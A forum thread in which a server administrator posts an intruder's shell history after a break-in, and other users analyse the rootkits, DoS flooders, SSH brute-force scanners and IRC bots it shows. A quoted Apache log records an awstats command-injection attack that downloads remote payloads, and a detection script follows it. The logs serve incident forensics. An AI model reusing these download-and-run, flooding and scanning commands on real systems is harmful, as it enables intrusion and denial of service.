# Caught somebody rootkiting me today

## fergusoa

 :Embarassed: 

This morning, somebody rootkited a machine I thought was reasonably secure (up-to-date ssh and apache, all other services blocked by shorewall). I discovered the intrusion before they had a chance to delete their .bash_history.

I'll be rebuilding the system (and another one they gained access to), but I'm sorta curious as to what they were up to, and I'm wondering if their history points to any glaring vulnerabilities that I should be aware of.

Any insight would be greatly appreciated!

```

w

wget 

cd /tmp

ls -a

uname -a

id

wget ps -x

ps -x

ps -awx

wget www.gas.as.ro/root

rm -rf 404-redirect.html

wget www.grutza.as.ro/root.tar.gz

tar zxvf root.tar.gz

cd root

ls -a

mv root.tar.gz /home

cd 

ls -a

cd /mtp

cd /tmp

mv root.tar.gz /guest

passwd

w

w

cd 

ls -a

wget www.grutza.as.ro/root.tar.gz

tar zxvf root.tar.gz

cd root

./hator

./memo

w

ls -al

./ptrace

w

ls -a

cd

cd root

./pt

./s

cd 

rm -rf root root.tar.gz

cd /tmp

rm -rf root.tar.gz

wget www.grutza.as.ro/vadimII.tgz

tar zxvf vadimII.tgz

./vadimII

./vadimII 208.38.154.110 53

./vadimII 208.38.154.110 53 0

w

ps -x

cd ..

cd /tm,p

cd /tmp

ls -a

rm -rf vadimII vadimII.tgz

wget socks.idilis.ro/flood.tgz

rm -rf blockpage.cgi?ws-session=100716957

wget http://www.funet.fi/pub/crypt/cryptography/pgp-local/old/stealth.tar.gz

tar zxvf stealth.tar.gz

./stealth

cd stealth.c

./stealth.c

make

./stealth

./stealth

ls -al

./stealth 208.38.154.110 53

w

rm -rf stealth.tar.gz stealth.o stealth.manual stealth.c stealth

wget lam3rz.de/psyBNC2.3.1.tar.gz; tar zxvf psyBNC2.3.1.tar.gz; rm -rf psyBNC2.3.1.tar.gz; cd psybnc; make; pico psybnc.conf

vi psybnc.conf

./psybnc

kill -9 6239

vi psybnc.conf

./psybnc

w

netstat -a

ls -a

ps -x

kill -9 6242

w

whois JustBodo.org

w

w

hostaname a

w

w

exit

w

uname -a

cd /tmp

wget www.kriminal.as.ro/bot.tar.gz

tar zxvf bot.tar.gz

cd bot

ls -a

pico mech.set

vi mech.set

vi bbb.usr

./initg

ps -x

kill -9 6408

kill -9 6411 6414

ls -a

cd 

ls -a

cd /tmp

ls -a

rm -rf bot 

rm -rf bot.tar.gz

wget www.grutza.as.ro/mech.tgz

tar zxvf mech.tgz

cd mech

ls -a

pico mech.set

vi mech.set

ls -a

vi ftpusers- 

./mech

ps -x

kill -9 6454 6452

w

ps -x

uname -a

id

w

cd /tmp

ls -al

cd mech

ls -al

less ftpusers- 

less mech.set 

pico ftpusers- 

vi ftpusers- 

vi mech.set 

vi mech.set 

mv mech bash-

./bash- 

./bash- 

./bash- 

passwd

exit

exit

w

ps -awx

w

w

wget 

wget www.grutza.as.ro/stealth

w

w

w

w

w

cd /tmp

l s-a

ftp www.icekid.dap.ro

w

wget wget www.icekid.dap.ro/gas.tar.gz

wget 80.96.205.14/gas.tar.gz

w

w

w

w

exit

a

ls -al

useradd

cd ..

wget www.geocities.com/catalinum/xnet.tar.gz

tar xzvf xnet.tar.gz 

w

uname 0a

uname -a

cd /tmp

ps -x

ls -al

cd .ssh

mkdir .ssh

cd .ssh

wget www.gas.as.ro/root.tar.gz

tar xzvf root.tar.gz 

cd root

./hator 

./memo 

./s

./km3 

ls

./pt

./ptrace 

./e

cd /tmp/.ssh

cd ssh/

mv r00t muie

./muie 212.200 -d 4

cd /tmp

cd .ssh/

cd ssh/

ls -al

./muie 215.125

./muie 215.125 -d 4

./muie 215 -d 4

./muie 212 -d 4

cd /tmp.ssh

cd /tmp..ssh

cd /tmp/.ssh

wget www.geocities.com/dorofteig/em.tar.gz

tar xzvf em.tar.gz 

cdem

cd em

cd emech/

pico emech.users 

vi emech.users 

cat mech.session 

ls

vi mech.session 

./httpd 

./httpd 

exit

cd /tmp

cd .ssh

ls -a

ps -x

kill -9 26396 

kill -9 26398

kill -9 4618

kill -9 4626

cd emech/

ls -a

pico emech.users 

vi emech.users 

./httpd 

./httpd 

./httpd 

cd ..

cd ssh

ls -a

cd ..

wget scanners.go.ro/wow.tgz

wget scanners.go.ro/wow.tgz

./brute

cd ssh/

./brute 

./muie 64.51 -d 4

cd /tmp/ssh

cd /tmp/.ssh

ftp ftp2.megaftpservers.com

ftp ftp2.megaftpservers.com

ls -a

mkdir wow

mv go.sh wow

cd wow

ls -a

cd ..

mv assh wow

mv pscan2  wow

mv ss eoe

mv ss wow

mv assh wow

cd wow

ls

cd ..

mv auto wow

ls -a

mc sshf wow

mv sshf wow

cd wow

ls -a

chmod +_x*

chmod +x *

ls -a

./assh 128.38

./assh 67.121

cd /tmp/.ssh

ls -a

ftp ftp2.megaftpservers.com

w

cd /tmp

cd .ssh

ls -a

rm -rf ssh xnet.tar.gz 

ftp ftp2.megaftpservers.com

cd /tmp

cd " "

ftp ftp2.megaftpservers.com

ls -a

chmod +x 8

chmod +x *

ls -a

wget www.xeofreestyle.com/2000/hybrid.swf

wget www.xeofreestyle.com/2000/hybrid.swf

wget www.xeofreestyle.com/2000/hybrid.swf

ls -a

rm -rf hyb*

ls -a

./assh 212.16

w

id

cat /etc/issue

cd /tmp

ls -a

cd " "

mkdir " "

cd " "

wget

wget lamisto.ws/wow.tgz

ls -a

rm -rf wow.tgz 

rm -rf wow.tar.gz 

wget lamisto.ws/wow.tar.gz

rm -rf wow.tar.gz 

ftp lamisto.ws

ftp ftp.lamisto.ws

ftp ftp2.megaftpservers.com

passwd

cd /tmp

w

who

cd " "

ls -a

./assh 212.16

ls -a

ftp ftp2.megaftpservers.com

cd /tmp

cd " "

ftp ftp.megaftpservers.com

ftp ftp2.megaftpservers.com

ls -a

chmod +x *

./sshf

./assh 212.16

ls -a

./assh 212.17

./assh 216.0

cd /tmp

mkdir " "

cd " "

ls -a

mkdir php

cd php

wget unixshellz.org/sanders/php.tgz

tar xzvf php.tgz 

ftp 212.16.54.197

cd /tmp

ls -a

cd " "

ls -a

cd php

ls -a

ftp sv1.33747.ip.nltree.nl

ftp 63.247.76.5

```

----------

## Petyr

The history basically to me appears to be everything they did after they'd already gained root access. Everything that I read in there (err... skimmed really but yea) points to them getting utils to cover their tracks and whatnot.

You're lucky you caught the bastard in the act. At least you know what he was attempting to do, but as for HOW he did it, that's the mystery. Check out your apache log files and all the other log files (please tell me you didn't format the box yet...)

anyhow, hope you figure out how they did it. I'd be interested to know at least. 

hth,

Petyr

----------

## hanj

I think you need to look for stuff in apache's access_log and error_log, also your ftp logs. Guessing that he didn't remove history, there is a good chance the useful entries are in there somewhere. 

Also, anything left in /tmp? 

What's your kernel version? 

What were your SSH settings (/etc/ssh/sshd_config)? 

There has been a rash of SSH brute force attempts.  Did you allow root access from SSH? 

Anything fo

Are all user's passwords 'strong'?

Anything in /var/log/auth.log or /var/log/messages?

You may be able to get a time stamp from running last and then grep on logs. Also, for forensic purposes... did you install chkrootkit and rkhunter to figure out possible vulnerabilities.. and to see what his root kit(s) have done.

Here is some info on some of the packages he installed...

vadimII

FROM: http://www.linuxquestions.org/questions/archive/4/2003/01/2/40902

Finally, about Vadim. From source code of predecessors vadim and vadimI we see vadimII is named after romanian politician called Corneliu Vadim Tudor. If sniffed on the wire a clue for marking payloads in the source: #define Vadim_STRING "0123456789" which does send(s, Vadim_STRING, Vadim_SIZE, 0); later on. Running strings on the binary reveals text "Vadim v.II[beta release] by Luciffer".

Like sl2, sl3 or slice they are DoS flooders. If unpacked from default archives it'll usually be in the vicinity of more flooders, IRC bouncers, (broadcast address) scanners. If hidden with a LKM like Adore dirs and processes will not show up on reboot.

stealth.c

FROM: http://www.packetstormsecurity.org/linux/modules/

Stealth.c is a Linux 2.2.x kernel module which discards packets that many OS detection tools use to query the TCP/IP stack. Includes logging of the dropped query packets and packets with bogus flags.

psyBNC2.3.1.tar.gz

FROM: http://www.voodoohosting.com/files/psyBNC_Install.txt

Before going through these options, do the following: know the IP of your shell. for example, if you connect to 'your.shell.com', go into mirc and type '/dns your.shell.com' to get the numeric IP. Also, choose a port for the bnc. We recommend some random number that no one will guess. Ok, on to the options:

Listening ports - You have to tell the bnc where to listen. You can have it listen on more than one port on the same IP, on multiple IPs with the same port, etc. For most people, listening on just one port on one IP is adequate. (the psybnc default is 31337)

hanji

----------

## zerojay

I would e-mail the servers that the downloaded files were stored on. There's a good chance that they were compromised as well.

----------

## justanothergentoofanatic

Did you find out how they rooted you? I'm curious because I also run Apache in its default configuration.

-Mike

----------

## zerojay

 *justanothergentoofanatic wrote:*   

> Did you find out how they rooted you? I'm curious because I also run Apache in its default configuration.
> 
> -Mike

 

php and phpBB exploits seem to be rather popular these days.

----------

## rshadow

I would be interested in not only how you were rooted.. but how did you detect that you were rooted?

----------

## fleed

One  more request for how they rooted you! I just want to make sure I don't have any vulnerabilities that might lead to the same happening to me.

----------

## codemaker

 *DarkStalker wrote:*   

> php and phpBB exploits seem to be rather popular these days.

 

I heard about phpBB exploits but nothing about php. What exploits are you talking about? Couldn't find any on bugtraq...   :Shocked: 

----------

## rex123

Is it certain that the attacker had root access? Whose .bash_history is that? If it's root, then how come fergusoa can still access after they've changed the password? Also if they got root, why are they putting all their files in a world-writable directory (ie /tmp)? Also, look how lame they are. Look at the bit where they download a program called "stealth", try to cd to a file, try to run some source code, then realise that the program doesn't do what they are trying to do and delete it all.

I don't know, but it's very possible that they didn't get root access, and the attempted exploits all failed (which is what you would hope, running a vaguely up-to-date Gentoo).

The attack looks extremely similar to one I've seen on a server I manage.

We ended up with a script called assh, which uses pscan2 to find machines running ssh, then tries to brute-force them (but not very hard). We also had a version of emech running and connecting to undernet IRC. No real harm was done, and they only had access for a couple of hours.

If you have a feeble password (eg "password", or the same as your username, which was our case) someone will notice, and later use that password to log on. But they don't have root access unless one of their exploits works. In our case they appeared to try to run an exploit that only works for <2.4.10 kernels, so it was no use at all. They also opened a bindshell backdoor that was useless because the port was closed at the firewall.

It's easy to assume the worst, and safest to remove the machine from the network altogether, but I don't think that just because someone has a file called "root" one should assume that the intruder had root access.

----------

## fergusoa

I'm fairly certain they gained access through a weak password --- we imported the passwd/shadow definitions from another host, which contained the username/password pair guest/guest!  I cannot be sure that they obtained root access, but we've rebuilt the systems regardless.  

To answer rshadow's question, the intrusion was spotted in the logs. I noticed that user 'guest' had logged on, and it didn't make any sense.

I've learned my lesson, and I'll be a whole lot more draconian about userspace/password issues in the future!  I work with a research group comprised of engineers with non-cs backgrounds, and we've been slowly learning the do's and don'ts of linux administration --- sometimes the hard way.

Thanks again for all the helpful comments!

----------

## Petyr

Be happy you work with Engineers rather than Scientists!

<grin>

Petyr

who has had the pleasure of working with scientists for almost 4 years running now...

----------

## Mugen096

Just curious, but through all of this, am assuming that the most basic of security steps was taken, that is to not allow the direct login of root through SSH and to also only allow root to be su'd through only a select few individuals?

Dan

----------

## someguy

"There has been a rash of SSH brute force attempts. Did you allow root access from SSH? "

I got rooted and my forum got fubared.

It wasn't ssh but I think they may have sniffed on mine somehow. I didn't really notice it till my daemons started failing.

I have some of what was left in /tmp, it was udp.pl. I think the guy was trying to use my machine for a ddos system. I give the guy serious respect tho, it has been the only time anything of mine has gotten hacked in almost 10 years. The guy cleaned after himself; there were some entries in /proc

that I can't figure out how tho. I'm about to check auth.log and I also got his initials in my apache log later on .... still got it heh

----------

## mattman206

I can't help but chuckle at the attacker's lack of Linux skills.

Example:

 *Quote:*   

> wget www.gas.as.ro/root
> 
> rm -rf 404-redirect.html
> ...

 

If you were really all about trying to get root.tar.gz downloaded, you would have just typed it the first time.

 *Quote:*   

> cd /mtp
> 
> cd /tmp 
> ...

 

Guess they can't type either!

 *Quote:*   

> wget www.grutza.as.ro/root.tar.gz 

 

Wait a sec, they already downloaded this once -- why download it again?

 *Quote:*   

> wget socks.idilis.ro/flood.tgz
> 
> rm -rf blockpage.cgi?ws-session=100716957 

 

Whoops, the file isn't there.  Why didn't they check that the file was really there on their local computer before trying to download it on a compromised system and leave tracks?

 *Quote:*   

> tar zxvf stealth.tar.gz
> 
> ./stealth
> 
> cd stealth.c
> ...

 

Hmmm, let's try to run a non-existent program, then change directories to a file, then try to run a C file!  Oh yeah...what was that program you use to compile a file.......mark, muck, oh! make!

 *Quote:*   

> ./stealth
> 
> ./stealth 208.38.154.110 53
> 
> rm -rf stealth.tar.gz stealth.o stealth.manual stealth.c stealth 

 

Hmm, guess it needs more command-line arguments.  Welp, guess it doesn't work, screw it.

 *Quote:*   

> wget lam3rz.de/psyBNC2.3.1.tar.gz; tar zxvf psyBNC2.3.1.tar.gz; rm -rf psyBNC2.3.1.tar.gz; cd psybnc; make; pico psybnc.conf 

 Oh my goodness, I can't believe that they strung multiple commands together with semi-colons!  Now that's getting fancy.  Probably just cutting/pasting from someplace.

 *Quote:*   

> psybnc.conf
> 
> vi psybnc.conf 

 

Yes, let's try to run a configuration file.  Oh wait, I have to edit it.

etc. etc. etc.

I can't imagine this attack was anything other than some script kiddie playing around.  If you google for some of the commands they typed in, especially the longer ones, you can find pages with step-by-step instructions for doing these kinds of things.

One in particular, containing the psyBNC attempt, has been taken down but is still in the google cache.  Unfortunately I don't know Spanish.

http://www.google.com/search?q=cache:fLBnxH1ETa4J:www.ircayuda.org/modules.php%3Fname%3DContent%26pa%3Dshowpage%26pid%3D20+lam3rz.de/psyBNC2.3.1.tar.gz%3B+tar+zxvf+psyBNC2.3.1.tar.gz%3B+rm+-rf+psyBNC2.3.1.tar.gz%3B+cd+psybnc%3B+make%3B+pico+psybnc.conf+&hl=en

Try googling for some of the other commands the attacker used -- maybe they'll turn up some more interesting clues.

HTH,

Matt

----------

## alxcm

I do understand Spanish.

On a cursory glance, that page is just instructions for setting up psyBNC and doesn't contain anything referencing hacking/rooting.  It definitely isn't written for a n00b, since (this is a little strange too) it recommends adding a user by editing /etc/passwd and /etc/group.

If you want me to look it over in a little more detail, just ask  :Wink: 

-Alex

----------

## Slynix

Someone got vadimII onto my computer over apache :/

----------

## drspewfy

All this stuff was made by a script kiddie.. he just wants HIS bot and your IP to hide in the IRC..

The psybnc works for IP spoofing.

The emech program.. is just for putting a BOt in his IRC channel..

It looks like he won't hurt you.. cuz he just wants the bot, and to spoof his IP...

They are really n00bs, and they don't know almost anything about UNIX..

They just know about rootkits, basic unix commands to run their programs.. and that's it!.. they are kids around 13-16 years old... they just know..   the FAmous ... "./program" 

When I was a child.. I did that kind of stuff.. that was 5 or 6 years ago.. now I'm 20.

JUST FORMAT YOUR SYSTEM... and upgrade your system more often..

BUT-..... I'M CURIOUS.. CHECK ALL YOUR Logs. How did he ROOT your box ????

Set up SNORT, tripwire, snort_inline; also read step by step the security handbook at gentoo.org/doc .. and apply it on your server... 

Seeya from Mexico

----------

## jonaswidarsson

hello.

I had vadimII today. Nothing feels like a cpu load of 100.0 caused by some cracker. You should try it some time...

Anyways, here is a strange log I grepped out of apache's error_log.

It seems the hole is in awstats.

```
ns tmp # tail /var/log/apache2/error_log -n 500 | grep 203.162.3.145

[Mon Oct 03 23:09:34 2005] [error] [client 203.162.3.145] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats

[Mon Oct 03 23:09:34 2005] [error] [client 203.162.3.145] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl

[Mon Oct 03 23:09:35 2005] [error] [client 203.162.3.145] File does not exist: /var/www/widarsson/cgi

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] --23:09:38--  http://www.coiuldefier.com/tback8080

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145]            => `tback8080'

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] Resolving www.coiuldefier.com...

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] failed: Host not found.

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] chmod:

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] cannot access `tback8080'

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] : No such file or directory

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145]

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] sh: line 1: ./tback8080: No such file or directory

[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] sh: line 1: fg: no job control

[Mon Oct 03 23:09:39 2005] [error] [client 203.162.3.145] File does not exist: /var/www/widarsson/stat-cgi

[Mon Oct 03 23:09:39 2005] [error] [client 203.162.3.145] script not found or unable to stat: /usr/share/webapps/awstats/6.1/hostroot/cgi-bin/perl

[Mon Oct 03 23:09:40 2005] [error] [client 203.162.3.145] File does not exist: /var/www/widarsson/cp

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] --23:09:56--  http://www.ralphy.as.ro/quake

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]            => `quake'

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] Resolving www.ralphy.as.ro...

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] 193.230.153.133

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] Connecting to www.ralphy.as.ro[193.230.153.133]:80...

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] connected.

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] HTTP request sent, awaiting response...

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] 200 OK

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] Length: 18,204 [text/plain]

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]     0K .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] ..

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] ..

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] . .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] ..

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .                                    100%  102.41 KB/s

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] 23:09:56 (102.41 KB/s) - `quake' saved [18204/18204]

[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]

[Mon Oct 03 23:09:57 2005] [error] [client 203.162.3.145] sh: line 1: fg: no job control

[Mon Oct 03 23:10:06 2005] [error] [client 203.162.3.145] sh: line 1: fg: no job control

[Mon Oct 03 23:14:57 2005] [error] [client 203.162.3.145] (70007)The timeout specified has expired: ap_content_length_filter: apr_bucket_read() failed

[Mon Oct 03 23:15:06 2005] [error] [client 203.162.3.145] (70007)The timeout specified has expired: ap_content_length_filter: apr_bucket_read() failed

```

And it was probably because of this:

http://www.gentoo.org/security/en/glsa/glsa-200501-36.xml
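The error_log above is a useful detection pattern: Apache logs a CGI probe for awstats.pl, and the very next lines for the same client are not Apache messages at all but the stderr of a shell (wget banners, `sh: line 1:`, `chmod:`), which only happens when the CGI was made to execute commands. The following is an added example (not from the original post or from awstats/Apache) that scans error_log lines for that combination; the sample lines are constructed after the excerpt above, with a placeholder host name.

```python
"""Flag Apache error_log clients that probed a CGI (awstats by default)
and then produced shell output in the same log. Added example; the sample
lines are constructed, not real data."""
import re
from collections import defaultdict

# Apache 2.0/2.2 error_log format: [timestamp] [level] [client IP] message
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[\d.]+)\] (?P<msg>.*)$")

# Messages Apache itself writes when a request hits a missing CGI/file.
PROBE_RE = re.compile(
    r"(script not found or unable to stat|File does not exist): (?P<path>\S+)")

# Messages that are really stdout/stderr of a shell spawned by a CGI:
# wget banners and resolver lines, shell errors, chmod errors.
EXEC_RE = re.compile(
    r"^(--\d\d:\d\d:\d\d--\s+\S+|Resolving \S+|Connecting to \S+|sh: line \d+:|chmod:|=> `)")

# Constructed sample, modelled on the thread's excerpt (host is a placeholder).
SAMPLE_LOG = """\
[Mon Oct 03 23:09:34 2005] [error] [client 203.162.3.145] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] --23:09:38--  http://example.invalid/tback8080
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] Resolving example.invalid...
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] sh: line 1: ./tback8080: No such file or directory
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] sh: line 1: fg: no job control
[Mon Oct 03 23:10:01 2005] [error] [client 192.0.2.10] File does not exist: /var/www/localhost/htdocs/favicon.ico
[Mon Oct 03 23:10:05 2005] [error] [client 198.51.100.7] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl
""".splitlines()


def parse(line):
    """Split one error_log line into its fields, or None if it is not one."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_cgi_abuse(lines, cgi_hint="awstats"):
    """Return {ip: {"probes": [paths], "exec": [messages]}} for clients that
    both probed a path containing cgi_hint and left shell output behind.
    A client that only probed (e.g. a scanner) is not reported."""
    by_ip = defaultdict(lambda: {"probes": [], "exec": []})
    for line in lines:
        rec = parse(line)
        if not rec:
            continue
        msg = rec["msg"]
        probe = PROBE_RE.search(msg)
        if probe and cgi_hint in probe.group("path"):
            by_ip[rec["ip"]]["probes"].append(probe.group("path"))
        elif EXEC_RE.match(msg):
            by_ip[rec["ip"]]["exec"].append(msg)
    return {ip: d for ip, d in by_ip.items() if d["probes"] and d["exec"]}


if __name__ == "__main__":
    for ip, d in find_cgi_abuse(SAMPLE_LOG).items():
        print(f"{ip}: {len(d['probes'])} CGI probe(s), {len(d['exec'])} shell output line(s)")
        for m in d["exec"]:
            print("   ", m)
```

On a real box, read the lines from /var/log/apache2/error_log instead of SAMPLE_LOG; the two other sample clients show that a plain 404 and a bare awstats probe without shell output are both ignored.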

----------

## Gotterdammerung

Man, that's something that would really take my sweet dreams away.

----------

## Matteo Azzali

 *drspewfy wrote:*   

> JUST FORMAT YOUR SYSTEM... and more often upgrade your system..
> 
>  BUT-..... IM CURIOUS.. CHECK ALL YOUR Logs. how did he ROOTED your box ????
> ...

 

I want some explanation on these irc bots:

Am I secured if irc ports are closed on my firewall?

Is there any other way to get rid of them that's not formatting???

(malware scanner/remover....)

Could an app-centric firewall (checking both the complete executable path and the checksum of the executable that generated/wants to receive the packets) protect me better?

----------

